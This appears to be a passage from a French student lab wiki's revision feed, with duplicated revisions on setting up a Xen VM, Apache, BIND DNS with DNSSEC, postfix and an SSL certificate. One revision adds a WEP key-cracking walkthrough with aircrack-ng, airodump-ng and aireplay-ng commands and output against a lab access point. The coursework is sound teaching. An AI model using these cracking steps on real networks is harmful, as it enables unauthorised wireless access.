&lt;br /&gt;
# The primary network interface&lt;br /&gt;
auto eth0&lt;br /&gt;
iface eth0 inet static&lt;br /&gt;
        address 193.48.57.181&lt;br /&gt;
        netmask 255.255.255.240&lt;br /&gt;
        gateway 193.48.57.190&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Puis pour prendre en compte ses modifications nous utilisons :&lt;br /&gt;
&amp;lt;pre&amp;gt;ifdown&lt;br /&gt;
ifup&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Après un reboot de notre machine virtuelle, nous pouvons ainsi installer différents packages comme :&lt;br /&gt;
&amp;lt;pre&amp;gt; apt-get install vim &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Configuration du service internet ==&lt;br /&gt;
Pour cela, il nous faut réaliser un serveur DNS qui permet de lier un nom de domaine à une adresse IP. Ainsi qu'un serveur Apache qui est un serveur HTTP&lt;br /&gt;
&lt;br /&gt;
=== Installation du serveur HTTP ===&lt;br /&gt;
&amp;lt;pre&amp;gt; apt-get install apache2 &amp;lt;/pre&amp;gt;&lt;br /&gt;
=== Installation du serveur DNS ===&lt;br /&gt;
&amp;lt;pre&amp;gt; apt-get install bind9 &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Si cette installation vous indique une erreur, il faut modifier le fichier  &amp;lt;i&amp;gt;/etc/apt/apt.conf.d/01proxy&amp;lt;/i&amp;gt;&lt;br /&gt;
et remplacer &lt;br /&gt;
&amp;lt;pre&amp;gt; Acquire::http::Proxy &amp;quot;http://proxy.polytech-lille.fr:3128&amp;quot;; &amp;lt;/pre&amp;gt;&lt;br /&gt;
par&lt;br /&gt;
&amp;lt;pre&amp;gt; Acquire::http::Proxy &amp;quot;http://helfaut.escaut.net:3128&amp;quot;; &amp;lt;/pre&amp;gt;&lt;br /&gt;
Cette modification est du a la modification du proxy de l'école.&lt;br /&gt;
&lt;br /&gt;
===Configuration de notre nom de domaine===&lt;br /&gt;
&lt;br /&gt;
Après l'achat de notre nom de domaine &amp;lt;i&amp;gt;orelsan.website&amp;lt;/i&amp;gt; sur www.gandi.net on vient modifier le glue records pour lier notre adresse IP au nom de domaine&lt;br /&gt;
dns.orelsan.webiste -&amp;gt; 193.48.57.181&lt;br /&gt;
Ensuite on se rend dans l'onglet modifier les DNS et on change le DNS indiquer par celui vu juste précédemment.&lt;br /&gt;
Puis nous allons modifier 3 fichiers :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;i&amp;gt;/etc/bind/named.conf.options&amp;lt;/i&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;options {&lt;br /&gt;
   allow-transfer { &amp;quot;allowed_to_transfer&amp;quot;; };&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
acl &amp;quot;allowed_to_transfer&amp;quot; {&lt;br /&gt;
   217.70.177.40/32 ; //passerelle de gandi  par defaut&lt;br /&gt;
 };&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;i&amp;gt;/etc/bind/named.conf.local &amp;lt;/i&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;//&lt;br /&gt;
// Do any local configuration here&lt;br /&gt;
//&lt;br /&gt;
&lt;br /&gt;
// Consider adding the 1918 zones here, if they are not used in your&lt;br /&gt;
// organization&lt;br /&gt;
//include &amp;quot;/etc/bind/zones.rfc1918&amp;quot;;&lt;br /&gt;
&lt;br /&gt;
 zone &amp;quot;orelsan.website&amp;quot; {&lt;br /&gt;
   type master;&lt;br /&gt;
   file &amp;quot;/etc/bind/orelsan.website/orelsan&amp;quot;;&lt;br /&gt;
 };&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;i&amp;gt;/etc/bind/orelsan.website/orelsan&amp;lt;/i&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;$TTL 259200&lt;br /&gt;
@ IN SOA dns postmaster.orelsan.website. (&lt;br /&gt;
        20               ; Version&lt;br /&gt;
        7200             ; Refresh (2h)&lt;br /&gt;
        3600             ; Retry   (1h)&lt;br /&gt;
        1209600          ; Expire (14j)&lt;br /&gt;
        259200 )         ; Minimum TTL (3j)&lt;br /&gt;
         IN NS dns&lt;br /&gt;
         IN NS ns6.gandi.net.&lt;br /&gt;
         IN A       193.48.57.181&lt;br /&gt;
         IN MX      100 dns&lt;br /&gt;
&lt;br /&gt;
dns     IN A       193.48.57.181&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour prendre en compte les paramètres changés dans les fichiers ci-dessous, il suffit d'effectuer les commandes:&lt;br /&gt;
&amp;lt;pre&amp;gt;service bind9 stop&lt;br /&gt;
service bind9 start&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour observer le bon fonctionnement de notre serveur, on peut visualiser les informations sur&lt;br /&gt;
&lt;br /&gt;
&amp;lt;i&amp;gt;cat /var/log/daemon.log&amp;lt;/i&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Puis un ping de notre page internet peut nous montrer également son bon fonctionnement&lt;br /&gt;
Si tout cela fonctionne on peut se rendre sur notre page.&lt;br /&gt;
Pour modifier les informations visible sur la page, il suffit d'aller dans &lt;br /&gt;
&amp;lt;i&amp;gt;/var/www/html/index.html&amp;lt;/i&amp;gt;. Toutes les informations écrites dans ce fichier seront visible sur notre page.&lt;br /&gt;
&lt;br /&gt;
===Installation boite mail===&lt;br /&gt;
&lt;br /&gt;
On commence par un installer postfix qui est un serveur de messagerie électronique.&lt;br /&gt;
&amp;lt;pre&amp;gt;apt-get install postfix&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois postfix installé, on indique le nom de domaine (orelsan.website) dans la configuration&lt;br /&gt;
&lt;br /&gt;
Dans &amp;lt;i&amp;gt;/etc/aliases&amp;lt;/i&amp;gt; on ajoute:&lt;br /&gt;
&amp;lt;pre&amp;gt;admin:root&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Puis on utilise la commande&lt;br /&gt;
&amp;lt;pre&amp;gt;newaliases&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On installe également bsd-mailx qui est un agent de courriel utilisateur simple.&lt;br /&gt;
&amp;lt;pre&amp;gt;apt-get install bsd-mailx&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Et pour observer nos mail, on tape la commande &amp;lt;i&amp;gt;mail&amp;lt;/i&amp;gt; dans la console.&lt;br /&gt;
L'adresse mail est admin@orelsan.website.&lt;br /&gt;
&lt;br /&gt;
===Générer une demande de certificat en SHA 2===&lt;br /&gt;
&amp;lt;pre&amp;gt;openssl req -nodes -newkey rsa:2048 -sha256 -keyout monserveur.key -out serveur.csr&lt;br /&gt;
&lt;br /&gt;
Country Name (2 letter code) [AU]:fr&lt;br /&gt;
State or Province Name (full name) [Some-State]:North&lt;br /&gt;
Locality Name (eg, city) []:Lille&lt;br /&gt;
Organization Name (eg, company) [Internet Widgits Pty Ltd]:Polytech&lt;br /&gt;
Organizational Unit Name (eg, section) []:IMA&lt;br /&gt;
Common Name (e.g. server FQDN or YOUR name) []:orelsan.website&lt;br /&gt;
Email Address []:admin@orelsan.website&lt;br /&gt;
&lt;br /&gt;
Please enter the following 'extra' attributes&lt;br /&gt;
to be sent with your certificate request&lt;br /&gt;
A challenge password []:&lt;br /&gt;
An optional company name []:&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Cette fonction nous crée 2 fichiers :&lt;br /&gt;
monserveur.key	serveur.csr&lt;br /&gt;
&lt;br /&gt;
-monserveur.key contient la clé privée.&lt;br /&gt;
&lt;br /&gt;
-serveur.csr contient la clé public.&lt;br /&gt;
&lt;br /&gt;
On va maintenant ajouter la clé public sur gandi pour qu'il nous génère un certificat.&lt;br /&gt;
On crée 2 fichier avec :&lt;br /&gt;
&lt;br /&gt;
-inter.crt qui contient le certificat intermédiaire.&lt;br /&gt;
&lt;br /&gt;
-gandi.crt qui qui contient le certificat .&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;root@Orelsan:~# ls&lt;br /&gt;
gandi.crt  inter.crt  mbox  monserveur.key  serveur.csr&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Dans le fichier &amp;lt;i&amp;gt;/etc/apache2/sites-enabled/000-default.conf&amp;lt;/i&amp;gt; on écrit: &lt;br /&gt;
&amp;lt;pre&amp;gt;&amp;lt;VirtualHost *:443&amp;gt;&lt;br /&gt;
&lt;br /&gt;
        ServerName www.orelsan.website&lt;br /&gt;
        ServerAlias orelsan.website&lt;br /&gt;
        DocumentRoot /var/www/html&lt;br /&gt;
        CustomLog /var/log/apache2/secure_access.log combined&lt;br /&gt;
&lt;br /&gt;
        SSLEngine on&lt;br /&gt;
	SLCertificateFile /root/gandi.crt&lt;br /&gt;
        SSLCertificateKeyFile /root/monserveur.key&lt;br /&gt;
        SSLCertificateChainFile /root/inter.crt&lt;br /&gt;
	SSLVerifyClient None&lt;br /&gt;
&amp;lt;/VirtualHost&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== DNSSEC ===&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, nous ajoutons l'option ci dessous dans le fichier &amp;lt;i&amp;gt;named.conf.options&amp;lt;/i&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;dnssec-enable yes &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Dans un répertoire, nous créons d'abord la clé asymétrique de signature puis celle de zone :&lt;br /&gt;
&amp;lt;pre&amp;gt;dnssec-keygen -a RSASHA1 -b 2048 -f KSK -r /dev/urandom -n ZONE orelsan.website &lt;br /&gt;
dnssec-keygen -a RSASHA1 -b 1024 -r /dev/urandom -n ZONE orelsan.website&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Après avoir renommé les noms de nos clé, nous ajoutons dans notre fichier de zone &lt;br /&gt;
&amp;lt;pre&amp;gt;$include /etc/bind/orelsan.website.dnssec/orelsan.website-ksk.key&lt;br /&gt;
$include /etc/bind/orelsan.website.dnssec/orelsan.website-zsk.key &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
et pour signez les enregistrements de la zone, nous utilisons la commande :&lt;br /&gt;
&amp;lt;pre&amp;gt;dnssec-signzone -o orelsan.website -k orelsan.website-ksk ../orelsan.website/orelsan orelsan.website-zsk&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Cassage clé ==&lt;br /&gt;
Pour le crackage de clé, nous allons utiliser le package aircrack-ng qui est un ensemble d'outils permettant de tester la sécurité d'un réseau&lt;br /&gt;
=== Cassage de clé WEP ===&lt;br /&gt;
Commençons par detecter notre interface wifi par le biais d'un&lt;br /&gt;
&amp;lt;pre&amp;gt;ifconfig&amp;lt;/pre&amp;gt;&lt;br /&gt;
ou&lt;br /&gt;
&amp;lt;pre&amp;gt;iwconfig&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Notre interface est wlan2 qui correspond à la clé wifi ajoutée sur l'ordinateur.&lt;br /&gt;
&lt;br /&gt;
Nous pouvons ainsi commencer à utiliser les outils de aircrack en debutant par &lt;br /&gt;
&amp;lt;pre&amp;gt;airmon-ng start wlan2 &amp;lt;/pre&amp;gt;&lt;br /&gt;
Cette commande permet de mettre en mode moniteur notre interface wifi&lt;br /&gt;
Si tout se passe correctement, vous allez voir apparaitre&lt;br /&gt;
&amp;lt;pre&amp;gt;creation du mon0&lt;br /&gt;
&lt;br /&gt;
Interface	Chipset		Driver&lt;br /&gt;
&lt;br /&gt;
mon0		Ralink RT2870/3070	rt2800usb - [phy1]&lt;br /&gt;
wlan0		Broadcom	wl - [phy0]&lt;br /&gt;
wlan2		Ralink RT2870/3070	rt2800usb - [phy1]&lt;br /&gt;
				(monitor mode enabled on mon1)&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Nous observons bien que le mode moniteur est activé pour notre wlan2.&lt;br /&gt;
&lt;br /&gt;
Nous pouvons observer tous les réseaux grâce à la commande &lt;br /&gt;
&amp;lt;pre&amp;gt;airodump-ng wlan2&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois que nous avons repéré  la cracotte que nous voulons cracker on refait un airodump pour se focaliser sur cette cracotte&lt;br /&gt;
&amp;lt;pre&amp;gt;airodump-ng  wlan2 -c 8 -essid cracotte03 --bssid 04:DA:D2:9C:50:52 -w crack&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
-c permet de le selectrionner le channel de communication&lt;br /&gt;
-w le nom du fichier dans lequel airodump va enregistrer les données&lt;br /&gt;
--bssid permet d'indiquer l'adresse mac de la cible &lt;br /&gt;
--essid permet d'indique le ssid de la cible (nom du réseau)&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;CH  8 ][ Elapsed: 1 min ][ 2016-11-21 15:08                                         &lt;br /&gt;
                                                                                                                                     &lt;br /&gt;
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID&lt;br /&gt;
                                                                                                                                     &lt;br /&gt;
 04:DA:D2:9C:50:52  -41  45      799    53316  506   8  54e. WEP  WEP         cracotte03                                             &lt;br /&gt;
                                                                                                                                     &lt;br /&gt;
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                                                           &lt;br /&gt;
                                                                                                                                     &lt;br /&gt;
 04:DA:D2:9C:50:52  00:0F:B5:92:23:6A  -28   54e-54e   222    60221&amp;lt;/pre&amp;gt;  &lt;br /&gt;
&lt;br /&gt;
On peut visualiser le nombre de paquets qui transit. &lt;br /&gt;
Pour permettre le crackage de la clé WEP, un nombre de data important est necessaire. Pour obtenir plus de data, nous pouvons utiliser la commande aireplay dans un autre terminal.&lt;br /&gt;
&amp;lt;pre&amp;gt;aireplay-ng -1 0 -e cracotte03 -a 04:DA:D2:9C:50:52 wlan2&lt;br /&gt;
No source MAC (-h) specified. Using the device MAC (40:A5:EF:05:AA:25)&lt;br /&gt;
15:00:01  Waiting for beacon frame (BSSID: 04:DA:D2:9C:50:51) on channel 8&lt;br /&gt;
&lt;br /&gt;
15:00:01  Sending Authentication Request (Open System)&lt;br /&gt;
&lt;br /&gt;
15:00:03  Sending Authentication Request (Open System)&lt;br /&gt;
&lt;br /&gt;
15:00:05  Sending Authentication Request (Open System) [ACK]&lt;br /&gt;
15:00:05  Authentication successful&lt;br /&gt;
15:00:05  Sending Association Request [ACK]&lt;br /&gt;
15:00:05  Association successful :-) (AID: 1) &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Et tout en laissant airodump ouvert sur un terminal, on vient trouver la clé WEP en utilisant la commande ci dessous dans un autre terminal&lt;br /&gt;
&amp;lt;pre&amp;gt;aircrack-ng crack.cap &lt;br /&gt;
                                                            Aircrack-ng 1.2 beta3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                                            [00:00:39] Tested 257766 keys (got 32866 IVs)&lt;br /&gt;
&lt;br /&gt;
   KB    depth   byte(vote)&lt;br /&gt;
    0    0/  1   EE(46080) B9(39936) 70(39680) B2(39168) 86(38656) 11(38400) B4(38400) F2(38400) A1(38144) 24(37632) &lt;br /&gt;
    1    0/  1   EE(45824) 11(44544) 7B(42240) 05(40960) 93(40448) C4(40448) EE(40448) 1C(39168) 3E(39168) 42(38912) &lt;br /&gt;
    2    0/  1   EE(45568) 36(42240) 6A(42240) 0D(40192) DC(39680) 98(39424) F3(39424) 39(39168) 3E(38912) B6(38656) &lt;br /&gt;
    3    0/  1   EE(48640) 11(43520) 61(40448) E6(40448) 00(38912) 9C(38656) EF(38656) 30(38400) B7(38400) 2A(38144) &lt;br /&gt;
    4    0/  1   EE(42240) 77(40960) AA(39936) 86(39424) F2(39168) FE(39168) 95(38912) 69(38656) 73(38656) AF(38656) &lt;br /&gt;
    5    1/  2   EE(42752) A2(41728) 34(41216) 46(40448) 0B(39680) 50(39424) 6C(39168) BA(39168) 7D(38912) 66(38656) &lt;br /&gt;
    6    0/  1   EE(44032) 8D(43264) 9F(40960) A0(40960) 74(40704) 17(40448) 91(39936) 66(39424) 5A(39168) C4(38912) &lt;br /&gt;
    7    0/  1   EE(44032) 36(40192) 4D(39680) 3D(39168) BF(39168) EC(38912) 9D(38656) EF(38656) A9(38400) B4(38144) &lt;br /&gt;
    8    0/  1   EE(48128) 35(40448) C1(39680) 9E(39424) F3(39424) C8(39168) 36(38656) 2E(38144) 7A(38144) C5(38144) &lt;br /&gt;
    9    0/  1   EE(45312) 74(42496) E7(40960) 6C(40192) 28(39936) 1B(39680) AF(39680) 71(38656) 44(38400) 2C(37888) &lt;br /&gt;
   10    3/  1   62(39424) BC(39424) 48(39168) 56(38912) AF(38912) 23(38400) 98(38400) A7(38144) 2B(37888) 79(37888) &lt;br /&gt;
   11    5/  1   68(38656) E9(38656) F9(38656) 1E(38400) 36(38400) 5A(38144) 92(38144) 5C(37888) 87(37888) CB(37888) &lt;br /&gt;
   12    0/  2   79(40780) 62(40380) 4D(40156) 85(39388) DE(39280) 4E(39060) 98(38876) A7(38544) 6A(38432) 82(38144) &lt;br /&gt;
&lt;br /&gt;
             KEY FOUND! [ EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:E4:44 ] &lt;br /&gt;
	Decrypted correctly: 100%&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Cassage de clé WPA-PSK ===&lt;/div&gt;</summary>
		<author><name>Jturut</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2016/2017_G4&amp;diff=35647</id>
		<title>TP sysres IMA2a5 2016/2017 G4</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2016/2017_G4&amp;diff=35647"/>
				<updated>2016-12-06T09:35:09Z</updated>
		
		<summary type="html">&lt;p&gt;Jturut : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;{| class=&amp;quot;wikitable centre&amp;quot; width=&amp;quot;100%&amp;quot;&lt;br /&gt;
|-&lt;br /&gt;
! scope=col | N° VLAN&lt;br /&gt;
! scope=col | Prénom&lt;br /&gt;
! scope=col | Réseau local&lt;br /&gt;
! scope=col | Nom VM&lt;br /&gt;
! scope=col | @IP VM &lt;br /&gt;
|-&lt;br /&gt;
| VLAN20        &lt;br /&gt;
| Dimitri          &lt;br /&gt;
| 10.60.20.0/24&lt;br /&gt;
| Vald&lt;br /&gt;
|193.48.57.182/28&lt;br /&gt;
|-&lt;br /&gt;
|VLAN21           &lt;br /&gt;
| Nabil         &lt;br /&gt;
| 10.60.21.0/24&lt;br /&gt;
| Pnl&lt;br /&gt;
|193.48.57.177/28&lt;br /&gt;
|-&lt;br /&gt;
| VLAN22&lt;br /&gt;
| Otmane              &lt;br /&gt;
| 10.60.22.0/24&lt;br /&gt;
| Lartiste&lt;br /&gt;
| 193.48.57.178/28&lt;br /&gt;
|-&lt;br /&gt;
| VLAN23  &lt;br /&gt;
| Hugo               &lt;br /&gt;
| 10.60.23.0/24 &lt;br /&gt;
| Gradur&lt;br /&gt;
| 193.48.57.179/28&lt;br /&gt;
|-&lt;br /&gt;
| VLAN24 &lt;br /&gt;
| Clement              &lt;br /&gt;
| 10.60.24.0/24 &lt;br /&gt;
| Gringe&lt;br /&gt;
| 193.48.57.180/28&lt;br /&gt;
|-&lt;br /&gt;
| VLAN25   &lt;br /&gt;
| Joan            &lt;br /&gt;
| 10.60.25.0/24 &lt;br /&gt;
| Orelsan&lt;br /&gt;
| 193.48.57.181/28&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
== Configuration du point d'accés Cisco ==&lt;br /&gt;
&lt;br /&gt;
== Installation d'une machine virtuelle ==&lt;br /&gt;
L'installation s'effectuée à l'aide du logiciel de virtualisation Xen. Nous possédons qu'un seul serveur pour 6. C'est pour cela qu'on passe par la création d'une machine virtuel pour que chacun puisse réaliser une serveur DNS, Apache sur sa machine virtuel.&lt;br /&gt;
Pour créer la machine virtuel, on tape la commande suivante :&lt;br /&gt;
&amp;lt;pre&amp;gt; xen-create-image --hostname Orelsan --ip 193.48.57.181 --netmask 255.255.255.240 --dir /usr/local/xen&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Entre deux séances de TP, nous avons eu un changement de version du kernel Linux. De ce fait il a fallu modifier le fichier &amp;lt;i&amp;gt;orelsan.cfg&amp;lt;/i&amp;gt; en remplaçant la version 3.14 en 3.16.0 &lt;br /&gt;
&amp;lt;pre&amp;gt; kernel      = '/boot/vmlinuz-3.16.0-4-amd64'&lt;br /&gt;
 extra       = 'elevator=noop'&lt;br /&gt;
 ramdisk     = '/boot/initrd.img-3.16.0-4-amd64'&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Lancement de notre machine virtuelle &lt;br /&gt;
&amp;lt;pre&amp;gt; xl create Orelsan.cvg &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Connection à notre machine virtuelle&lt;br /&gt;
&amp;lt;pre&amp;gt; xl console Orelsan &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On peut également voir la liste de toutes les machines virtuelles ouvertes avec :&lt;br /&gt;
&amp;lt;pre&amp;gt; xl list &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois la connexion sur notre machine établie, nous devons changer le fichier &amp;lt;i&amp;gt;interfaces&amp;lt;/i&amp;gt; pour permettre une connexion à internet:&lt;br /&gt;
&amp;lt;pre&amp;gt;# The loopback network interface&lt;br /&gt;
auto lo&lt;br /&gt;
iface lo inet loopback&lt;br /&gt;
&lt;br /&gt;
# The primary network interface&lt;br /&gt;
auto eth0&lt;br /&gt;
iface eth0 inet static&lt;br /&gt;
        address 193.48.57.181&lt;br /&gt;
        netmask 255.255.255.240&lt;br /&gt;
        gateway 193.48.57.190&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Puis pour prendre en compte ses modifications nous utilisons :&lt;br /&gt;
&amp;lt;pre&amp;gt;ifdown&lt;br /&gt;
ifup&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Après un reboot de notre machine virtuelle, nous pouvons ainsi installer différents packages comme :&lt;br /&gt;
&amp;lt;pre&amp;gt; apt-get install vim &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Configuration du service internet ==&lt;br /&gt;
Pour cela, il nous faut réaliser un serveur DNS qui permet de lier un nom de domaine à une adresse IP. Ainsi qu'un serveur Apache qui est un serveur HTTP&lt;br /&gt;
&lt;br /&gt;
=== Installation du serveur HTTP ===&lt;br /&gt;
&amp;lt;pre&amp;gt; apt-get install apache2 &amp;lt;/pre&amp;gt;&lt;br /&gt;
=== Installation du serveur DNS ===&lt;br /&gt;
&amp;lt;pre&amp;gt; apt-get install bind9 &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Si cette installation vous indique une erreur, il faut modifier le fichier  &amp;lt;i&amp;gt;/etc/apt/apt.conf.d/01proxy&amp;lt;/i&amp;gt;&lt;br /&gt;
et remplacer &lt;br /&gt;
&amp;lt;pre&amp;gt; Acquire::http::Proxy &amp;quot;http://proxy.polytech-lille.fr:3128&amp;quot;; &amp;lt;/pre&amp;gt;&lt;br /&gt;
par&lt;br /&gt;
&amp;lt;pre&amp;gt; Acquire::http::Proxy &amp;quot;http://helfaut.escaut.net:3128&amp;quot;; &amp;lt;/pre&amp;gt;&lt;br /&gt;
Cette modification est du a la modification du proxy de l'école.&lt;br /&gt;
&lt;br /&gt;
===Configuration de notre nom de domaine===&lt;br /&gt;
&lt;br /&gt;
Après l'achat de notre nom de domaine &amp;lt;i&amp;gt;orelsan.website&amp;lt;/i&amp;gt; sur www.gandi.net on vient modifier le glue records pour lier notre adresse IP au nom de domaine&lt;br /&gt;
dns.orelsan.webiste -&amp;gt; 193.48.57.181&lt;br /&gt;
Ensuite on se rend dans l'onglet modifier les DNS et on change le DNS indiquer par celui vu juste précédemment.&lt;br /&gt;
Puis nous allons modifier 3 fichiers :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;i&amp;gt;/etc/bind/named.conf.options&amp;lt;/i&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;options {&lt;br /&gt;
   allow-transfer { &amp;quot;allowed_to_transfer&amp;quot;; };&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
acl &amp;quot;allowed_to_transfer&amp;quot; {&lt;br /&gt;
   217.70.177.40/32 ; //passerelle de gandi  par defaut&lt;br /&gt;
 };&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;i&amp;gt;/etc/bind/named.conf.local &amp;lt;/i&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;//&lt;br /&gt;
// Do any local configuration here&lt;br /&gt;
//&lt;br /&gt;
&lt;br /&gt;
// Consider adding the 1918 zones here, if they are not used in your&lt;br /&gt;
// organization&lt;br /&gt;
//include &amp;quot;/etc/bind/zones.rfc1918&amp;quot;;&lt;br /&gt;
&lt;br /&gt;
 zone &amp;quot;orelsan.website&amp;quot; {&lt;br /&gt;
   type master;&lt;br /&gt;
   file &amp;quot;/etc/bind/orelsan.website/orelsan&amp;quot;;&lt;br /&gt;
 };&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;i&amp;gt;/etc/bind/orelsan.website/orelsan&amp;lt;/i&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;$TTL 259200&lt;br /&gt;
@ IN SOA dns postmaster.orelsan.website. (&lt;br /&gt;
        20               ; Version&lt;br /&gt;
        7200             ; Refresh (2h)&lt;br /&gt;
        3600             ; Retry   (1h)&lt;br /&gt;
        1209600          ; Expire (14j)&lt;br /&gt;
        259200 )         ; Minimum TTL (3j)&lt;br /&gt;
         IN NS dns&lt;br /&gt;
         IN NS ns6.gandi.net.&lt;br /&gt;
         IN A       193.48.57.181&lt;br /&gt;
         IN MX      100 dns&lt;br /&gt;
&lt;br /&gt;
dns     IN A       193.48.57.181&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour prendre en compte les paramètres changés dans les fichiers ci-dessous, il suffit d'effectuer les commandes:&lt;br /&gt;
&amp;lt;pre&amp;gt;service bind9 stop&lt;br /&gt;
service bind9 start&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour observer le bon fonctionnement de notre serveur, on peut visualiser les informations sur&lt;br /&gt;
&lt;br /&gt;
&amp;lt;i&amp;gt;cat /var/log/daemon.log&amp;lt;/i&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Puis un ping de notre page internet peut nous montrer également son bon fonctionnement&lt;br /&gt;
Si tout cela fonctionne on peut se rendre sur notre page.&lt;br /&gt;
Pour modifier les informations visible sur la page, il suffit d'aller dans &lt;br /&gt;
&amp;lt;i&amp;gt;/var/www/html/index.html&amp;lt;/i&amp;gt;. Toutes les informations écrites dans ce fichier seront visible sur notre page.&lt;br /&gt;
&lt;br /&gt;
===Installation boite mail===&lt;br /&gt;
&lt;br /&gt;
On commence par un installer postfix qui est un serveur de messagerie électronique.&lt;br /&gt;
&amp;lt;pre&amp;gt;apt-get install postfix&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois postfix installé, on indique le nom de domaine (orelsan.website) dans la configuration&lt;br /&gt;
&lt;br /&gt;
Dans &amp;lt;i&amp;gt;/etc/aliases&amp;lt;/i&amp;gt; on ajoute:&lt;br /&gt;
&amp;lt;pre&amp;gt;admin:root&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Puis on utilise la commande&lt;br /&gt;
&amp;lt;pre&amp;gt;newaliases&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On installe également bsd-mailx qui est un agent de courriel utilisateur simple.&lt;br /&gt;
&amp;lt;pre&amp;gt;apt-get install bsd-mailx&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Et pour observer nos mail, on tape la commande &amp;lt;i&amp;gt;mail&amp;lt;/i&amp;gt; dans la console.&lt;br /&gt;
L'adresse mail est admin@orelsan.website.&lt;br /&gt;
&lt;br /&gt;
===Générer une demande de certificat en SHA 2===&lt;br /&gt;
&amp;lt;pre&amp;gt;openssl req -nodes -newkey rsa:2048 -sha256 -keyout monserveur.key -out serveur.csr&lt;br /&gt;
&lt;br /&gt;
Country Name (2 letter code) [AU]:fr&lt;br /&gt;
State or Province Name (full name) [Some-State]:North&lt;br /&gt;
Locality Name (eg, city) []:Lille&lt;br /&gt;
Organization Name (eg, company) [Internet Widgits Pty Ltd]:Polytech&lt;br /&gt;
Organizational Unit Name (eg, section) []:IMA&lt;br /&gt;
Common Name (e.g. server FQDN or YOUR name) []:orelsan.website&lt;br /&gt;
Email Address []:admin@orelsan.website&lt;br /&gt;
&lt;br /&gt;
Please enter the following 'extra' attributes&lt;br /&gt;
to be sent with your certificate request&lt;br /&gt;
A challenge password []:&lt;br /&gt;
An optional company name []:&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Cette fonction nous crée 2 fichiers :&lt;br /&gt;
monserveur.key	serveur.csr&lt;br /&gt;
&lt;br /&gt;
